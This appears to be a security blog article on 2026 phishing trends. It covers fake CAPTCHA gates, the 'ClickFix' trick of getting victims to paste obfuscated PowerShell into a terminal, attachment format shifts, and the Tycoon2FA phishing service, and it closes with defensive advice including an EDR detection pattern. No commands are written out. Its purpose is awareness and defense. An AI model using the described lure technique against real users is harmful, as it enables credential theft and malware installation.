Cybercriminals have found a psychological “cheat code” to bypass your security: the CAPTCHA. In the first quarter of 2026, Microsoft Threat Intelligence blocked a staggering 8.3 billion phishing emails, but the real story is how those attacks were delivered. +1
As automated email filters get better at blocking malicious links, attackers are hiding their scams behind layered social engineering tricks like fake CAPTCHA gates and “ClickFix” maneuvers. By the end of March 2026, CAPTCHA-gated phishing attacks surged by 125%, hitting an annual high of 11.9 million monthly incidents. +1
The Rise of “ClickFix”: When You Are the Malware
Traditional malware downloads a file to your computer. The new “ClickFix” technique is much more devious: it tricks you into running the code yourself. +1
- The Lure: You arrive at a page that looks like a routine security check or a “browser error” page.
- The Trick: The page tells you that to “fix” a technical issue or verify you are human, you must copy a string of text and paste it into your Windows Terminal (or Run dialog).
- The Result: That text is actually an obfuscated PowerShell command. The moment you press Enter, you unknowingly execute the attacker’s payload—often Lumma Stealer or Tycoon2FA—bypassing nearly every traditional security scanner on the market. +1
Rapid Rotation: From HTML to a 356% PDF Surge
Attackers are currently running real-time experiments to see what slips past your inbox. In Q1 2026, they rotated through file formats at a dizzying pace:
| Payload Format | Trend in Q1 2026 | Key Discovery |
|---|---|---|
| SVG Files | 49% Spike (Feb) | Used 1.2M messages to hide credential forms inside “image” files. |
| HTML Attachments | 175% Increase | Function as “portable” phishing sites that render locally in your browser. |
| PDF Files | 356% Surge (March) | Now the #1 vehicle for CAPTCHA lures, hitting a 12-month volume high. |
Export to Sheets
PDFs have become the favorite carrier because they are widely trusted by users and often receive less scrutiny from basic email gateways than .zip or .html files.
Tycoon2FA: The Industrialization of Phishing
The engine behind many of these attacks is Tycoon2FA (Storm-1747), a Phishing-as-a-Service (PhaaS) platform. While a major international law enforcement operation disrupted Tycoon2FA in March 2026, its “legacy” lives on. +1
As Tycoon’s market share dropped from 75% to 41%, a swarm of aggressive newcomers like Kratos and EvilTokens rushed in to fill the void. This means the CAPTCHA-gate technique is no longer a “specialty”—it is now a standard, commodity tool available to any low-level hacker with a few hundred dollars.
How to Protect Your Organization
With 94% of all payload-based attacks now targeting your credentials, the goal is clear: your password is not enough protection.
- Enforce FIDO2 Passkeys: Move away from SMS or app-based MFA codes, which can be intercepted by “Adversary-in-the-Middle” (AiTM) kits like Tycoon2FA. Passkeys are phishing-resistant. +1
- Verify the CAPTCHA: Teach employees that a legitimate website will never ask them to copy and paste a command into their Terminal or Command Prompt to solve a CAPTCHA.
- Enable ZAP: Activate Zero-hour Auto Purge (ZAP) in Microsoft Defender to retroactively remove malicious emails that were identified after they hit the inbox.
- Watch the Browser: Use EDR (Endpoint Detection and Response) to monitor for unusual parent-child process relationships, such as
browser.exespawningpowershell.exe.
